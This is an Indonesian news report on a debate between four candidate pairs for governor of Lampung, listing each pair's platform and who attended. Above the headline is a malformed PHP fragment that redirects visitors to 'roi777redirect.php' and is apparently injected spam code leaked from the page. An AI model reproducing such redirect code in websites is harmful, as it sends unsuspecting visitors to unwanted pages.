header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Debat Empat  Calon Gubernur dan Wakil Gubernur Lampung Perang Visi- Misi -
Debat Empat  Calon Gubernur dan Wakil Gubernur Lampung Perang Visi- Misi

TRANSLAMPUNG.COM, BANDARLAMPUNG – Perang visi-misi dalam debat Kandidat empat pasangan calon (Paslon) Gubernur dan Wakil Gubernur Lampung yang dilaksanakan di Balroom Hotel Novotel Lampung Sabtu (7/4) malam .

Adapun masing-masing visi-misi yang akan di laksanakan oleh calon nomer urut satu yakni Muhamad Ridho Ficardo-Bachtiar Basri memaparkan yakni Lampung berdaya saing, sedangkan program calon nomer urut dua yakni Herman HN -Sutono memaparkan pendidikan gratis bagi masyarakat di Provinsi Lampung.

Sedangkan calon yang lainya yakni calon nomer urut tiga Arinal Djunaidi -Chusnunia Salim memaparkan visi-misi para petani yang berjaya dan untuk calon gubernur nomer urut terakhir yakni pasangan nomer empat Mustofa -Ahamad Jajuli memaparkan visi-misi pengetasan kemiskinan yang ada di Provinsi Lampung.

Diketahui dalam acara debat kandidat yang di hadiri oleh empat Paslon Gubernur dan Wakil Gubernur Lampung ini di hadiri oleh Pasangan nomer unrut satu Muhamad Ridho Fikardo – Bachtiar Basri, paslon nomer urut dua Herman HN-Sutono, pasangan nomer urut nomer tiga Arinal Djunaidi -Chusnunia Salim sedangkan untuk calon nomer urut emapat Mustofa -Ahmad Jajuli hanya dihadiri oleh pasangan wakil gubernur Ahmad Jajuli. Dan hadir pula dalam acara tersebut jajaran KPU Lampung dan Jajaran kepolisian dareah lampung serta seluruh tim sukses pendukung masing masing emapat calon gubernur dan wakil gubernur (ydn/hkw).

News Reporter